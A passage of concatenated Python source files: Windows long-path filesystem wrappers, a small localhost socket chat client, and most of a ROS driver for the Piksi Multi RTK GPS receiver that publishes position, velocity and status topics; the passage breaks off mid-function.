"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
client_code.py
|
import socket
import random
from threading import Thread
from datetime import datetime
from colorama import Fore, init, Back
init()
colors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX,
Fore.LIGHTBLUE_EX]
client_color = random.choice(colors)
SERVER_HOST = "127.0.0.1"
SERVER_PORT = 5002
separator_token = "<SEP>"
s = socket.socket()
print(f"[*] connecting to {SERVER_HOST}:{SERVER_PORT}...")
s.connect((SERVER_HOST, SERVER_PORT))
print("[+] connected")
name = input("Enter your name:")
def listen_for_messages():
while True:
message = s.recv(1024).decode()
print("\n" + message)
t = Thread(target=listen_for_messages)
t.daemon = True
t.start()
while True:
to_send = input()
if to_send.lower() == "q":
break
date_now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
to_send = f"{client_color}[{date_now}]{name}{separator_token}{to_send}{Fore.RESET}"
s.send(to_send.encode())
s.close()
|
piksi_multi.py
|
#!/usr/bin/env python
#
# Title: piksi_multi.py
# Description: ROS Driver for Piksi Multi RTK GPS module
# Dependencies: libsbp (https://github.com/swift-nav/libsbp), tested with version = see LIB_SBP_VERSION_MULTI
# Based on original work of https://bitbucket.org/Daniel-Eckert/piksi_node
#
import rospy
import math
import numpy as np
import std_srvs.srv
# Import message types
from sensor_msgs.msg import NavSatFix, NavSatStatus
import piksi_rtk_msgs # TODO(rikba): If we dont have this I get NameError: global name 'piksi_rtk_msgs' is not defined.
from piksi_rtk_msgs.msg import (AgeOfCorrections, BaselineEcef, BaselineHeading, BaselineNed, BasePosEcef, BasePosLlh,
DeviceMonitor_V2_3_15, DopsMulti, GpsTimeMulti, Heartbeat, ImuRawMulti,
InfoWifiCorrections, Log, MagRaw, MeasurementState_V2_4_1, Observation, PosEcef, PosLlhMulti,
ReceiverState_V2_4_1, UartState_V2_3_15, UtcTimeMulti, VelEcef, VelNed)
from piksi_rtk_msgs.srv import *
from geometry_msgs.msg import (PoseWithCovarianceStamped, PointStamped, PoseWithCovariance, Point, TransformStamped,
Transform)
# Import Piksi SBP library
from sbp.client.drivers.pyserial_driver import PySerialDriver
from sbp.client.drivers.network_drivers import TCPDriver
from sbp.client import Handler, Framer
from sbp.navigation import *
from sbp.logging import *
from sbp.system import *
from sbp.tracking import * # WARNING: tracking is part of the draft messages, could be removed in future releases of libsbp.
from sbp.piksi import * # WARNING: piksi is part of the draft messages, could be removed in future releases of libsbp.
from sbp.observation import *
from sbp.orientation import * # WARNING: orientation messages are still draft messages.
from sbp.settings import *
from zope.interface.exceptions import Invalid
# Piksi Multi features an IMU
from sbp.imu import *
# Piksi Multi features a Magnetometer Bosh bmm150 : https://www.bosch-sensortec.com/bst/products/all_products/bmm150
from sbp.mag import SBP_MSG_MAG_RAW, MsgMagRaw
# At the moment importing 'sbp.version' module causes ValueError: Cannot find the version number!
# import sbp.version
# networking stuff
import UdpHelpers
import time
import subprocess
import re
import threading
import sys
import collections
class PiksiMulti:
LIB_SBP_VERSION_MULTI = '2.4.1' # SBP version used for Piksi Multi.
# Geodetic Constants.
kSemimajorAxis = 6378137
kSemiminorAxis = 6356752.3142
kFirstEccentricitySquared = 6.69437999014 * 0.001
kSecondEccentricitySquared = 6.73949674228 * 0.001
kFlattening = 1 / 298.257223563
def __init__(self):
# Print info.
rospy.init_node('piksi')
rospy.sleep(0.5) # Wait for a while for init to complete before printing.
rospy.loginfo(rospy.get_name() + " start")
# Check SBP version.
if 'sbp.version' in sys.modules:
installed_sbp_version = sbp.version.get_git_version()
else:
installed_sbp_version = self.get_installed_sbp_version()
rospy.loginfo("libsbp version currently used: " + installed_sbp_version)
# Check for correct SBP library version dependent on Piksi device.
if PiksiMulti.LIB_SBP_VERSION_MULTI != installed_sbp_version:
rospy.logwarn("Lib SBP version in usage (%s) is different than the one used to test this driver (%s)!\n"
"Please run the install script: 'install/install_piksi_multi.sh'" % (
installed_sbp_version, PiksiMulti.LIB_SBP_VERSION_MULTI))
# Open a connection to SwiftNav receiver.
interface = rospy.get_param('~interface', 'serial')
if interface == 'tcp':
tcp_addr = rospy.get_param('~tcp_addr', '192.168.0.222')
tcp_port = rospy.get_param('~tcp_port', 55555)
try:
self.driver = TCPDriver(tcp_addr, tcp_port)
except SystemExit:
rospy.logerr("Unable to open TCP connection %s:%s", (tcp_addr, tcp_port))
raise
else:
serial_port = rospy.get_param('~serial_port', '/dev/ttyUSB0')
baud_rate = rospy.get_param('~baud_rate', 230400)
try:
self.driver = PySerialDriver(serial_port, baud=baud_rate)
except SystemExit:
rospy.logerr("Swift receiver not found on serial port '%s'", serial_port)
raise
# Create a handler to connect Piksi driver to callbacks.
self.driver_verbose = rospy.get_param('~driver_verbose', True)
self.framer = Framer(self.driver.read, self.driver.write, verbose=self.driver_verbose)
self.handler = Handler(self.framer)
self.debug_mode = rospy.get_param('~debug_mode', False)
if self.debug_mode:
rospy.loginfo("Swift driver started in debug mode, every available topic will be published.")
# Debugging parameters.
debug_delayed_corrections_stack_size = rospy.get_param('~debug_delayed_corrections_stack_size', 10)
# self.received_corrections_fifo_stack = collections.deque([], debug_delayed_corrections_stack_size)
# rospy.loginfo("Debug mode: delayed corrections stack size: %d." % debug_delayed_corrections_stack_size)
else:
rospy.loginfo("Swift driver started in normal mode.")
# Corrections over WiFi settings.
self.base_station_mode = rospy.get_param('~base_station_mode', False)
self.udp_broadcast_addr = rospy.get_param('~broadcast_addr', '255.255.255.255')
self.udp_port = rospy.get_param('~broadcast_port', 26078)
self.base_station_ip_for_latency_estimation = rospy.get_param(
'~base_station_ip_for_latency_estimation',
'192.168.0.1')
self.multicaster = []
self.multicast_recv = []
# Navsatfix settings.
self.var_spp = rospy.get_param('~var_spp', [25.0, 25.0, 64.0])
self.var_rtk_float = rospy.get_param('~var_rtk_float', [25.0, 25.0, 64.0])
self.var_rtk_fix = rospy.get_param('~var_rtk_fix', [0.0049, 0.0049, 0.01])
self.var_spp_sbas = rospy.get_param('~var_spp_sbas', [1.0, 1.0, 1.0])
self.navsatfix_frame_id = rospy.get_param('~navsatfix_frame_id', 'gps')
# Local ENU frame settings.
self.origin_enu_set = False
self.latitude0 = 0.0
self.longitude0 = 0.0
self.altitude0 = 0.0
self.initial_ecef_x = 0.0
self.initial_ecef_y = 0.0
self.initial_ecef_z = 0.0
self.ecef_to_ned_matrix = np.eye(3)
self.enu_frame_id = rospy.get_param('~enu_frame_id', 'enu')
self.transform_child_frame_id = rospy.get_param('~transform_child_frame_id', 'gps_receiver')
if rospy.has_param('~latitude0_deg') and rospy.has_param('~longitude0_deg') and rospy.has_param(
'~altitude0'):
latitude0 = rospy.get_param('~latitude0_deg')
longitude0 = rospy.get_param('~longitude0_deg')
altitude0 = rospy.get_param('~altitude0')
# Set origin ENU frame to coordinate specified by rosparam.
self.init_geodetic_reference(latitude0, longitude0, altitude0)
rospy.loginfo("Origin ENU frame set by rosparam.")
# Watchdog timer info
self.watchdog_time = rospy.get_rostime()
self.messages_started = False
# Other parameters.
self.publish_raw_imu_and_mag = rospy.get_param('~publish_raw_imu_and_mag', False)
# Advertise topics and services.
self.publishers = self.advertise_topics()
self.service_servers = self.advertise_services()
# Create topic callbacks.
self.create_topic_callbacks()
# Init messages with "memory".
self.receiver_state_msg = self.init_receiver_state_msg()
self.num_wifi_corrections = self.init_num_corrections_msg()
# Corrections over wifi message, if we are not the base station.
if not self.base_station_mode:
# Start new thread to periodically ping base station.
threading.Thread(target=self.ping_base_station_over_wifi).start()
self.handler.start()
# Handle firmware settings services
self.last_section_setting_read = []
self.last_setting_read = []
self.last_value_read = []
# Only have start-up reset in base station mode
if self.base_station_mode:
# Things have 30 seconds to start or we will kill node
rospy.Timer(rospy.Duration(30), self.cb_watchdog, True)
# Spin.
rospy.spin()
def create_topic_callbacks(self):
# Callbacks from SBP messages (cb_sbp_*) implemented "manually".
self.handler.add_callback(self.cb_sbp_glonass_biases, msg_type=SBP_MSG_GLO_BIASES)
self.handler.add_callback(self.cb_sbp_heartbeat, msg_type=SBP_MSG_HEARTBEAT)
self.handler.add_callback(self.cb_sbp_pos_llh, msg_type=SBP_MSG_POS_LLH)
self.handler.add_callback(self.cb_sbp_base_pos_ecef, msg_type=SBP_MSG_BASE_POS_ECEF)
self.handler.add_callback(self.cb_sbp_obs, msg_type=SBP_MSG_OBS)
self.handler.add_callback(self.cb_sbp_settings_read_by_index_resp, msg_type=SBP_MSG_SETTINGS_READ_BY_INDEX_RESP)
self.handler.add_callback(self.cb_settings_read_resp, msg_type=SBP_MSG_SETTINGS_READ_RESP)
self.handler.add_callback(self.cb_sbp_measurement_state, msg_type=SBP_MSG_MEASUREMENT_STATE)
self.handler.add_callback(self.cb_sbp_uart_state, msg_type=SBP_MSG_UART_STATE)
# Callbacks generated "automatically".
self.init_callback('baseline_ecef_multi', BaselineEcef,
SBP_MSG_BASELINE_ECEF, MsgBaselineECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('baseline_ned_multi', BaselineNed,
SBP_MSG_BASELINE_NED, MsgBaselineNED,
'tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
self.init_callback('dops_multi', DopsMulti,
SBP_MSG_DOPS, MsgDops, 'tow', 'gdop', 'pdop', 'tdop', 'hdop', 'vdop', 'flags')
self.init_callback('gps_time_multi', GpsTimeMulti,
SBP_MSG_GPS_TIME, MsgGPSTime, 'wn', 'tow', 'ns_residual', 'flags')
self.init_callback('utc_time_multi', UtcTimeMulti,
SBP_MSG_UTC_TIME, MsgUtcTime,
'flags', 'tow', 'year', 'month', 'day', 'hours', 'minutes', 'seconds', 'ns')
self.init_callback('pos_ecef_multi', PosEcef,
SBP_MSG_POS_ECEF, MsgPosECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('vel_ecef', VelEcef,
SBP_MSG_VEL_ECEF, MsgVelECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('vel_ned', VelNed,
SBP_MSG_VEL_NED, MsgVelNED,
'tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
self.init_callback('log', Log,
SBP_MSG_LOG, MsgLog, 'level', 'text')
self.init_callback('baseline_heading', BaselineHeading,
SBP_MSG_BASELINE_HEADING, MsgBaselineHeading, 'tow', 'heading', 'n_sats', 'flags')
self.init_callback('age_of_corrections', AgeOfCorrections,
SBP_MSG_AGE_CORRECTIONS, MsgAgeCorrections, 'tow', 'age')
self.init_callback('device_monitor', DeviceMonitor_V2_3_15,
SBP_MSG_DEVICE_MONITOR, MsgDeviceMonitor, 'dev_vin', 'cpu_vint', 'cpu_vaux',
'cpu_temperature', 'fe_temperature')
# Raw IMU and Magnetometer measurements.
if self.publish_raw_imu_and_mag:
self.init_callback('imu_raw', ImuRawMulti,
SBP_MSG_IMU_RAW, MsgImuRaw,
'tow', 'tow_f', 'acc_x', 'acc_y', 'acc_z', 'gyr_x', 'gyr_y', 'gyr_z')
self.init_callback('mag_raw', MagRaw,
SBP_MSG_MAG_RAW, MsgMagRaw, 'tow', 'tow_f', 'mag_x', 'mag_y', 'mag_z')
# Only if debug mode
if self.debug_mode:
self.handler.add_callback(self.cb_sbp_base_pos_llh, msg_type=SBP_MSG_BASE_POS_LLH)
# do not publish llh message, prefer publishing directly navsatfix_spp or navsatfix_rtk_fix.
# self.init_callback('pos_llh', PosLlh,
# SBP_MSG_POS_LLH, MsgPosLLH,
# 'tow', 'lat', 'lon', 'height', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
# Relay "corrections" messages via UDP if in base station mode.
if self.base_station_mode:
rospy.loginfo("Starting device in Base Station Mode")
self.multicaster = UdpHelpers.SbpUdpMulticaster(self.udp_broadcast_addr, self.udp_port)
else:
rospy.loginfo("Starting device in Rover Mode")
self.multicast_recv = UdpHelpers.SbpUdpMulticastReceiver(self.udp_port, self.multicast_callback)
def init_num_corrections_msg(self):
num_wifi_corrections = InfoWifiCorrections()
num_wifi_corrections.header.seq = 0
num_wifi_corrections.received_corrections = 0
num_wifi_corrections.latency = -1
return num_wifi_corrections
def init_receiver_state_msg(self):
receiver_state_msg = ReceiverState_V2_4_1()
receiver_state_msg.num_sat = 0 # Unknown.
receiver_state_msg.rtk_mode_fix = False # Unknown.
receiver_state_msg.sat = [] # Unknown.
receiver_state_msg.cn0 = [] # Unknown.
receiver_state_msg.system_error = 255 # Unknown.
receiver_state_msg.io_error = 255 # Unknown.
receiver_state_msg.swift_nap_error = 255 # Unknown.
receiver_state_msg.external_antenna_present = 255 # Unknown.
receiver_state_msg.num_gps_sat = 0 # Unknown.
receiver_state_msg.cn0_gps = [] # Unknown.
receiver_state_msg.num_sbas_sat = 0 # Unknown.
receiver_state_msg.cn0_sbas = [] # Unknown.
receiver_state_msg.num_glonass_sat = 0 # Unknown.
receiver_state_msg.cn0_glonass = [] # Unknown.
receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_UNKNOWN
return receiver_state_msg
def advertise_topics(self):
"""
Advertise topics.
:return: python dictionary, with topic names used as keys and publishers as values.
"""
publishers = {}
publishers['rtk_fix'] = rospy.Publisher(rospy.get_name() + '/navsatfix_rtk_fix',
NavSatFix, queue_size=10)
publishers['spp'] = rospy.Publisher(rospy.get_name() + '/navsatfix_spp',
NavSatFix, queue_size=10)
publishers['best_fix'] = rospy.Publisher(rospy.get_name() + '/navsatfix_best_fix',
NavSatFix, queue_size=10)
publishers['heartbeat'] = rospy.Publisher(rospy.get_name() + '/heartbeat',
Heartbeat, queue_size=10)
publishers['measurement_state'] = rospy.Publisher(rospy.get_name() + '/measurement_state',
piksi_rtk_msgs.msg.MeasurementState_V2_4_1, queue_size=10)
publishers['receiver_state'] = rospy.Publisher(rospy.get_name() + '/debug/receiver_state',
ReceiverState_V2_4_1, queue_size=10)
# Do not publish llh message, prefer publishing directly navsatfix_spp or navsatfix_rtk_fix.
# publishers['pos_llh'] = rospy.Publisher(rospy.get_name() + '/pos_llh',
# PosLlh, queue_size=10)
publishers['vel_ned'] = rospy.Publisher(rospy.get_name() + '/vel_ned',
VelNed, queue_size=10)
publishers['log'] = rospy.Publisher(rospy.get_name() + '/log',
Log, queue_size=10)
publishers['uart_state'] = rospy.Publisher(rospy.get_name() + '/uart_state',
UartState_V2_3_15, queue_size=10)
publishers['device_monitor'] = rospy.Publisher(rospy.get_name() + '/device_monitor',
DeviceMonitor_V2_3_15, queue_size=10)
# Points in ENU frame.
publishers['enu_pose_fix'] = rospy.Publisher(rospy.get_name() + '/enu_pose_fix',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_fix'] = rospy.Publisher(rospy.get_name() + '/enu_point_fix',
PointStamped, queue_size=10)
publishers['enu_transform_fix'] = rospy.Publisher(rospy.get_name() + '/enu_transform_fix',
TransformStamped, queue_size=10)
publishers['enu_pose_spp'] = rospy.Publisher(rospy.get_name() + '/enu_pose_spp',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_spp'] = rospy.Publisher(rospy.get_name() + '/enu_point_spp',
PointStamped, queue_size=10)
publishers['enu_transform_spp'] = rospy.Publisher(rospy.get_name() + '/enu_transform_spp',
TransformStamped, queue_size=10)
publishers['gps_time_multi'] = rospy.Publisher(rospy.get_name() + '/gps_time',
GpsTimeMulti, queue_size=10)
publishers['baseline_ned_multi'] = rospy.Publisher(rospy.get_name() + '/baseline_ned',
BaselineNed, queue_size=10)
publishers['utc_time_multi'] = rospy.Publisher(rospy.get_name() + '/utc_time',
UtcTimeMulti, queue_size=10)
publishers['baseline_heading'] = rospy.Publisher(rospy.get_name() + '/baseline_heading',
BaselineHeading, queue_size=10)
publishers['age_of_corrections'] = rospy.Publisher(rospy.get_name() + '/age_of_corrections',
AgeOfCorrections, queue_size=10)
publishers['enu_pose_best_fix'] = rospy.Publisher(rospy.get_name() + '/enu_pose_best_fix',
PoseWithCovarianceStamped, queue_size=10)
# Raw IMU and Magnetometer measurements.
if self.publish_raw_imu_and_mag:
publishers['imu_raw'] = rospy.Publisher(rospy.get_name() + '/imu_raw',
ImuRawMulti, queue_size=10)
publishers['mag_raw'] = rospy.Publisher(rospy.get_name() + '/mag_raw',
MagRaw, queue_size=10)
# Topics published only if in "debug mode".
if self.debug_mode:
publishers['rtk_float'] = rospy.Publisher(rospy.get_name() + '/navsatfix_rtk_float',
NavSatFix, queue_size=10)
publishers['vel_ecef'] = rospy.Publisher(rospy.get_name() + '/vel_ecef',
VelEcef, queue_size=10)
publishers['enu_pose_float'] = rospy.Publisher(rospy.get_name() + '/enu_pose_float',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_float'] = rospy.Publisher(rospy.get_name() + '/enu_point_float',
PointStamped, queue_size=10)
publishers['enu_transform_float'] = rospy.Publisher(rospy.get_name() + '/enu_transform_float',
TransformStamped, queue_size=10)
publishers['baseline_ecef_multi'] = rospy.Publisher(rospy.get_name() + '/baseline_ecef',
BaselineEcef, queue_size=10)
publishers['dops_multi'] = rospy.Publisher(rospy.get_name() + '/dops',
DopsMulti, queue_size=10)
publishers['pos_ecef_multi'] = rospy.Publisher(rospy.get_name() + '/pos_ecef',
PosEcef, queue_size=10)
publishers['observation'] = rospy.Publisher(rospy.get_name() + '/observation',
Observation, queue_size=10)
publishers['base_pos_llh'] = rospy.Publisher(rospy.get_name() + '/base_pos_llh',
BasePosLlh, queue_size=10)
publishers['base_pos_ecef'] = rospy.Publisher(rospy.get_name() + '/base_pos_ecef',
BasePosEcef, queue_size=10)
if not self.base_station_mode:
publishers['wifi_corrections'] = rospy.Publisher(rospy.get_name() + '/debug/wifi_corrections',
InfoWifiCorrections, queue_size=10)
return publishers
def advertise_services(self):
"""
Advertise service servers.
:return: python dictionary, with service names used as keys and servers as values.
"""
servers = {}
servers['reset_piksi'] = rospy.Service(rospy.get_name() +
'/reset_piksi',
std_srvs.srv.SetBool,
self.reset_piksi_service_callback)
servers['settings_write'] = rospy.Service(rospy.get_name() +
'/settings_write',
SettingsWrite,
self.settings_write_server)
servers['settings_read_req'] = rospy.Service(rospy.get_name() +
'/settings_read_req',
SettingsReadReq,
self.settings_read_req_server)
servers['settings_read_resp'] = rospy.Service(rospy.get_name() +
'/settings_read_resp',
SettingsReadResp,
self.settings_read_resp_server)
servers['settings_save'] = rospy.Service(rospy.get_name() +
'/settings_save',
std_srvs.srv.SetBool,
self.settings_save_callback)
return servers
def ping_base_station_over_wifi(self):
"""
Ping base station periodically without blocking the driver.
"""
ping_deadline_seconds = 3
interval_between_pings_seconds = 5
while not rospy.is_shutdown():
# Send ping command.
command = ["ping",
"-w", str(ping_deadline_seconds), # deadline before stopping attempt
"-c", "1", # number of pings to send
self.base_station_ip_for_latency_estimation]
ping = subprocess.Popen(command, stdout=subprocess.PIPE)
out, error = ping.communicate()
# Search for 'min/avg/max/mdev' round trip delay time (rtt) numbers.
matcher = re.compile("(\d+.\d+)/(\d+.\d+)/(\d+.\d+)/(\d+.\d+)")
if matcher.search(out) == None:
# No ping response within ping_deadline_seconds.
# In python write and read operations on built-in type are atomic,
# there's no need to use mutex.
self.num_wifi_corrections.latency = -1
else:
groups_rtt = matcher.search(out).groups()
avg_rtt = groups_rtt[1]
# In python write and read operations on built-in type are atomic,
# there's no need to use mutex.
self.num_wifi_corrections.latency = float(avg_rtt)
time.sleep(interval_between_pings_seconds)
def make_callback(self, sbp_type, ros_message, pub, attrs):
"""
Dynamic generator for callback functions for message types from
the SBP library.
Inputs: 'sbp_type' name of SBP message type.
'ros_message' ROS message type with SBP format.
'pub' ROS publisher for ros_message.
'attrs' array of attributes in SBP/ROS message.
Returns: callback function 'callback'.
"""
def callback(msg, **metadata):
sbp_message = sbp_type(msg)
ros_message.header.stamp = rospy.Time.now()
for attr in attrs:
if attr == 'flags':
# Least significat three bits of flags indicate status.
if (sbp_message.flags & 0x07) == 0:
return # Invalid message, do not publish it.
setattr(ros_message, attr, getattr(sbp_message, attr))
pub.publish(ros_message)
return callback
def init_callback(self, topic_name, ros_datatype, sbp_msg_type, callback_data_type, *attrs):
"""
Initializes the callback function for an SBP
message type.
Inputs: 'topic_name' name of ROS topic for publisher
'ros_datatype' ROS custom message type
'sbp_msg_type' name of SBP message type for callback function
'callback_data_type' name of SBP message type for SBP library
'*attrs' array of attributes in ROS/SBP message
"""
# Check that required topic has been advertised.
if topic_name in self.publishers:
ros_message = ros_datatype()
# Add callback function.
pub = self.publishers[topic_name]
callback_function = self.make_callback(callback_data_type, ros_message, pub, attrs)
self.handler.add_callback(callback_function, msg_type=sbp_msg_type)
def cb_sbp_obs(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgObs(msg_raw)
obs_msg = Observation()
obs_msg.header.stamp = rospy.Time.now()
obs_msg.tow = msg.header.t.tow
obs_msg.ns_residual = msg.header.t.ns_residual
obs_msg.wn = msg.header.t.wn
obs_msg.n_obs = msg.header.n_obs
obs_msg.P = []
obs_msg.L_i = []
obs_msg.L_f = []
obs_msg.D_i = []
obs_msg.D_f = []
obs_msg.cn0 = []
obs_msg.lock = []
obs_msg.flags = []
obs_msg.sid_sat = []
obs_msg.sid_code = []
for observation in msg.obs:
obs_msg.P.append(observation.P)
obs_msg.L_i.append(observation.L.i)
obs_msg.L_f.append(observation.L.f)
obs_msg.D_i.append(observation.D.i)
obs_msg.D_f.append(observation.D.f)
obs_msg.cn0.append(observation.cn0)
obs_msg.lock.append(observation.lock)
obs_msg.flags.append(observation.flags)
obs_msg.sid_sat.append(observation.sid.sat)
obs_msg.sid_code.append(observation.sid.code)
self.publishers['observation'].publish(obs_msg)
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_base_pos_llh(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgBasePosLLH(msg_raw)
pose_llh_msg = BasePosLlh()
pose_llh_msg.header.stamp = rospy.Time.now()
pose_llh_msg.lat = msg.lat
pose_llh_msg.lon = msg.lon
pose_llh_msg.height = msg.height
self.publishers['base_pos_llh'].publish(pose_llh_msg)
def cb_sbp_base_pos_ecef(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgBasePosECEF(msg_raw)
pose_ecef_msg = BasePosEcef()
pose_ecef_msg.header.stamp = rospy.Time.now()
pose_ecef_msg.x = msg.x
pose_ecef_msg.y = msg.y
pose_ecef_msg.z = msg.z
self.publishers['base_pos_ecef'].publish(pose_ecef_msg)
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_uart_state(self, msg_raw, **metadata):
msg = MsgUartState(msg_raw)
uart_state_msg = UartState_V2_3_15()
uart_state_msg.latency_avg = msg.latency.avg
uart_state_msg.latency_lmin = msg.latency.lmin
uart_state_msg.latency_lmax = msg.latency.lmax
uart_state_msg.latency_current = msg.latency.current
uart_state_msg.obs_period_avg = msg.obs_period.avg
uart_state_msg.obs_period_pmin = msg.obs_period.pmin
uart_state_msg.obs_period_pmax = msg.obs_period.pmax
uart_state_msg.obs_period_current = msg.obs_period.current
self.publishers['uart_state'].publish(uart_state_msg)
def multicast_callback(self, msg, **metadata):
if self.framer:
# TODO (marco-tranzatto) probably next commented part should be completely deleted.
# if self.debug_mode:
# # Test network delay by storing a fixed number of correction messages and retrieving the oldest one.
# # TODO (marco-tranzatto) check if we need to store even **metadata or not
# # self.received_corrections_fifo_stack.append([msg, **metadata])
# # oldest_correction = self.received_corrections_fifo_stack.popleft()
# self.received_corrections_fifo_stack.append(msg)
# oldest_correction = self.received_corrections_fifo_stack.popleft()
# self.framer(oldest_correction, **metadata)
# else:
# self.framer(msg, **metadata)
self.framer(msg, **metadata)
# Publish debug message about wifi corrections, if enabled.
self.num_wifi_corrections.header.seq += 1
self.num_wifi_corrections.header.stamp = rospy.Time.now()
self.num_wifi_corrections.received_corrections += 1
if not self.base_station_mode:
self.publishers['wifi_corrections'].publish(self.num_wifi_corrections)
else:
rospy.logwarn("Received external SBP msg, but Piksi not connected.")
def cb_sbp_glonass_biases(self, msg_raw, **metadata):
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_watchdog(self, event):
if ((rospy.get_rostime() - self.watchdog_time).to_sec() > 10.0):
rospy.logwarn("Heartbeat failed, watchdog triggered.")
if self.base_station_mode:
rospy.signal_shutdown("Watchdog triggered, was gps disconnected?")
def cb_sbp_pos_llh(self, msg_raw, **metadata):
msg = MsgPosLLH(msg_raw)
# Invalid messages.
if msg.flags == PosLlhMulti.FIX_MODE_INVALID:
return
# SPP GPS messages.
elif msg.flags == PosLlhMulti.FIX_MODE_SPP:
self.publish_spp(msg.lat, msg.lon, msg.height, self.var_spp, NavSatStatus.STATUS_FIX)
# Differential GNSS (DGNSS)
elif msg.flags == PosLlhMulti.FIX_MODE_DGNSS:
rospy.logwarn(
"[cb_sbp_pos_llh]: case FIX_MODE_DGNSS was not implemented yet." +
"Contact the package/repository maintainers.")
# TODO what to do here?
return
# RTK messages.
elif msg.flags == PosLlhMulti.FIX_MODE_FLOAT_RTK:
# For now publish RTK float only in debug mode.
if self.debug_mode:
self.publish_rtk_float(msg.lat, msg.lon, msg.height)
elif msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK:
# Use first RTK fix to set origin ENU frame, if it was not set by rosparam.
if not self.origin_enu_set:
self.init_geodetic_reference(msg.lat, msg.lon, msg.height)
self.publish_rtk_fix(msg.lat, msg.lon, msg.height)
# Dead reckoning
elif msg.flags == PosLlhMulti.FIX_MODE_DEAD_RECKONING:
rospy.logwarn(
"[cb_sbp_pos_llh]: case FIX_MODE_DEAD_RECKONING was not implemented yet." +
"Contact the package/repository maintainers.")
return
# SBAS Position
elif msg.flags == PosLlhMulti.FIX_MODE_SBAS:
self.publish_spp(msg.lat, msg.lon, msg.height, self.var_spp_sbas, NavSatStatus.STATUS_SBAS_FIX)
else:
rospy.logerr(
"[cb_sbp_pos_llh]: Unknown case, you found a bug!" +
"Contact the package/repository maintainers." +
"Report: 'msg.flags = %d'" % (msg.flags))
return
# Update debug msg and publish.
self.receiver_state_msg.rtk_mode_fix = True if (msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK) else False
if msg.flags == PosLlhMulti.FIX_MODE_INVALID:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_INVALID
elif msg.flags == PosLlhMulti.FIX_MODE_SPP:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_SPP
elif msg.flags == PosLlhMulti.FIX_MODE_DGNSS:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_DGNSS
elif msg.flags == PosLlhMulti.FIX_MODE_FLOAT_RTK:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_FLOAT_RTK
elif msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_FIXED_RTK
elif msg.flags == PosLlhMulti.FIX_MODE_DEAD_RECKONING:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.FIX_MODE_DEAD_RECKONING
elif msg.flags == PosLlhMulti.FIX_MODE_SBAS:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_SBAS
else:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_UNKNOWN
self.publish_receiver_state_msg()
def publish_spp(self, latitude, longitude, height, variance, navsatstatus_fix):
self.publish_wgs84_point(latitude, longitude, height, variance, navsatstatus_fix,
self.publishers['spp'],
self.publishers['enu_pose_spp'], self.publishers['enu_point_spp'],
self.publishers['enu_transform_spp'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_rtk_float(self, latitude, longitude, height):
self.publish_wgs84_point(latitude, longitude, height, self.var_rtk_float, NavSatStatus.STATUS_GBAS_FIX,
self.publishers['rtk_float'],
self.publishers['enu_pose_float'], self.publishers['enu_point_float'],
self.publishers['enu_transform_float'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_rtk_fix(self, latitude, longitude, height):
self.publish_wgs84_point(latitude, longitude, height, self.var_rtk_fix, NavSatStatus.STATUS_GBAS_FIX,
self.publishers['rtk_fix'],
